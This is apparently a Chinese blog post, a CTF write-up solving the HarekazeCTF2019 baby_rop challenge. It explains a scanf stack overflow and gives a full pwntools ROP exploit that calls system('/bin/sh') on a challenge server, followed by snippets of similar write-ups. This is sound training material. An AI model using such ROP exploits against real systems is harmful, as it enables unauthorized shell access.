[HarekazeCTF2019]baby_rop

Baby_ROP挑战解析
最新推荐文章于 2025-01-10 19:31:29 发布
原创 最新推荐文章于 2025-01-10 19:31:29 发布 · 673 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #python #网络安全 #CTF #WriteUP

本文介绍[HarekazeCTF2019]baby_rop题目的解决过程,通过利用栈溢出覆盖返回地址指向system@PLT,并传递/bin/sh作为参数来获取shell。文章详细分析了漏洞利用的技术细节。

[HarekazeCTF2019]baby_rop

使用checksec查看:
在这里插入图片描述

只开启了栈不可执行。

放进IDA中分析:
在这里插入图片描述

  • system("echo -n \"What's your name? \"");:system()可用
  • __isoc99_scanf("%s", &v4);:存在栈溢出

查看字符串:
在这里插入图片描述

  • 存在/bin/sh字符串

题目思路

  • 利用栈溢出覆盖返回地址为system@PLT
  • 传入system()的参数/bin/sh
  • 即可getshell

步骤解析

无需

完整exp

from pwn import *

#start
r = remote("node4.buuoj.cn",26718)
# r = process("../buu/[HarekazeCTF2019]baby_rop")
elf = ELF("../buu/[HarekazeCTF2019]baby_rop")

#params
rdi_addr = 0x400683
bin_sh_addr = 0x601048
system_addr = elf.symbols['system']

#attack
payload=b'M'*0x18 + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
r.sendline(payload)

r.interactive()
[HarekazeCTF2019]baby_rop1
m0_64195960的博客
06-30 930
前言:有两个新的知识点,一个是寻找函数地址,一个是当flag不在根目录下的解决办法开启了栈不可执行保护我们看到了system函数,我们通过shift+f12找一下字符串呜呜它给的实在太多了,有system函数,有/bin/sh,有栈溢出下面介绍两种找system函数地址的方式(因为博主之前只会做那种白给后门函数的题,或者gdb找)注意:我们在这里不是嗯翻,一个程序plt装载的位置大概在灰色部分后面一点(具体原因就不展开啦)我们可以通过调上方彩色的部分来定位这个有点烦,但还是讲讲这样就可以直接获得的,比较发现
[HarekazeCTF2019]baby_rop[BUUCTF]
moonlightsunshin的博客
05-05 564
这个时候思路就很清晰了根据64位函数传参的特点构造ROP链就行,32位与64位传参的区别这里就不再赘述,读者可以看上一篇jarvisoj_level2_x64[BUUCTF] ,根据名字可以猜到这道题考的rop同时是64位的程序。用find -name flag查找路径再cat。
BUUCTF|PWN-[HarekazeCTF2019]baby_rop2-WP
l2645470582_的博客
01-18 731
1.检查保护机制 开启了堆栈不可执行 2.用64位IDA打开该文件 (1)shift+f12,查看关键字符串 (2)双击,ctrl+x,进入反汇编代码 (3)ROPgadget查看返回地址 (4)payload payload = b'a'*(0x20+0x8) + p64(pop_rdi) + p64(format_) + p64(pop_r15) + p64(got_addr) + p64(0) + p64(plt_addr) + p64(main_addr) 1.
BUU-[HarekazeCTF2019]baby_rop
qq_45771413的博客
04-27 2080
查看保护 IDA scanf没限制输入长度,这里可以溢出v4 寻找system和敏感字符串: 都找到了,看来可以缝合缝合了。 解题 这次还是rop,但是还是查阅了相关资料,比第一次做时理解要深刻点。也会用寻找ret返回的工具: ROPgadget ROP相关概念: ROP就是使用返回指令ret连接代码的一种技术 (同理还可以使用jmp系列指令和call指令,有时候也会对应地成为JOP/COP)。 一个程序中必然会存在函数,而有函数就会有ret指令。 而ret指令的本质是pop eip,即把当前栈顶的内
PWN——Buuoj [HarekazeCTF2019]baby_rop
u014377094的博客
01-21 797
先用IDA64打开,发现scanf看一眼存入数据的位置 熟悉的味道 按一下shift f12 system函数和/bin/sh都给了那就不客气了 困难题我唯唯诺诺,简单题我重拳出击 思路明确,现在还需要pop rdi,ret来传一下参数(str“/bin/sh)到system里 这个时候用到了ROPgadget 里面的babyrop是这道题的文件名,其他题换一下就ok 现在找到了地址,准备工作完成,敲python 有一点需要注意的是,咱们明明找的是400683,搁ida里咋面目
BUUCTF pwn [HarekazeCTF2019]baby_rop
菜的只能随便写写博客
02-13 2737
0x01 文件分析   0x02 运行  一组回显   0x03 IDA  程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。   0x04 思路  简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...
BUUCTF PWN [HarekazeCTF2019]baby_rop
Rt1Text的博客
05-27 409
1.checksec+运行 64位/NX堆栈不可执行 2.IDA进行中 1.main函数 本题函数倒不是很多 很明显,格式化字符串漏洞 2.system bin/sh 3.offset 总体来看64位寄存器传参 3.EXP from pwn import* p=remote('node4.buuoj.cn',27198) shell=0x601048 system=0x400496 rdi=0x400683 payload=b'a'*(...
buuctf [HarekazeCTF2019]baby_rop
carol2358的博客
04-17 490
可以在程序里找到binsh,ctrl+L, 程序本身有system函数 找到rop 修改system参数为/bin/sh,然后跳转到system运行就可以了,最后加一个假的返回地址 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level...
HarekazeCTF2019 baby_rop
m0_73743784的博客
08-28 330
非常经典的 ROP
BUUCTF [HarekazeCTF2019]baby_rop
2401_88087539的博客
01-10 440
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
HarekazeCTF2019_baby_rop
z1r0的博客
12-04 797
HarekazeCTF2019_baby_rop 查看保护 溢出,有system和bin,rop就行 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25987) else: r = process(file_name) elf = ELF(file
【BUUCTF - PWNbaby_rop
古月浪子的博客
04-05 458
checksec一下,栈溢出 IDA打开看看,很明显的溢出点,/bin/sh字符串在程序里也有现成的,通过ROPgadget找到pop rdi命令即可将/bin/sh作为参数调用system from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_leve...
[HarekazeCTF2019]baby_rop2 1(含libc.so.6文件)(一些问题有待解决)
weixin_52111404的博客
12-11 1299
题时遇到了不少问题,有些还没有得到解决,在此进行记录
[HarekazeCTF2019]baby_rop2
m0_52231248的博客
11-16 983
[HarekazeCTF2019]baby_rop2 Checksec: Ida: 很容易看到read存在溢出,offest=0x28 程序中没有system函数和sh字段我们要用ret2libc绕过nx保护 程序中存在printf函数我们用它来泄漏libc基址 先找到printf需要填的rdi和rsi Exp: from pwn import * from LibcSearcher import * context.log_level='debug' r=remote("n
[HarekazeCTF2019]baby_rop2 1
最新发布
10-27
[HarekazeCTF2019]baby_rop2是一道64位、开启了NX保护的Pwn题目,利用思路为ret2libc,涉及printf函数和read函数。程序中定义了`char buf[28];`,但在使用`read(0, buf, 0x100uLL);`时,向buf读取输入最多256(0x100)...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值